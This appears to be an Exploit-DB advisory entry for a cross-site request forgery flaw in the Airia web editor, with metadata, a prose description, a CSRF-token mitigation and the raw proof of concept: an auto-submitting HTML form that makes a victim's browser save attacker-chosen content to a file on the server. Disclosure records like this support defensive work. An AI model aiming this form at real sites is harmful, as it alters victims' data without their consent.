Airia - CSRF Vulnerability(Add content)

vendor:

Airia

by:

HaHwul

4,3

CVSS

MEDIUM

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Airia

Affected Version From: Latest commit

Affected Version To: Latest commit

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian [wheezy]

2016

Airia – CSRF Vulnerability(Add content)

This exploit uses a form to send a POST request to the vulnerable Airia application. The POST request contains a mode, file, scrollvalue, contents, and group parameter. The mode parameter is set to 'save', which will save the contents parameter to the file specified in the file parameter. The contents parameter is set to 'CSRF Attack', which will be saved to the file specified in the file parameter. The group parameter is set to '1', which will set the group of the file to '1'. The exploit is triggered by submitting the form using a JavaScript submit command.

Mitigation:

Implementing a CSRF token in the application can help prevent this type of attack.

Source

Exploit-DB raw data:

<!--
# Exploit Title: Airia - CSRF Vulnerability(Add content)
# Date: 2016-06-20
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ytyng.com
# Software Link: https://github.com/ytyng/airia/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
-->

<form name="csrf_poc" action="http://127.0.0.1/vul_test/airia/editor.php" method="POST">
<input type="hidden" name="mode" value="save">
<input type="hidden" name="file" value="1">
<input type="hidden" name="scrollvalue" value="">
<input type="hidden" name="contents" value="CSRF Attack">
<input type="hidden" name="group" value="1">

<input type="submit" value="Replay!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>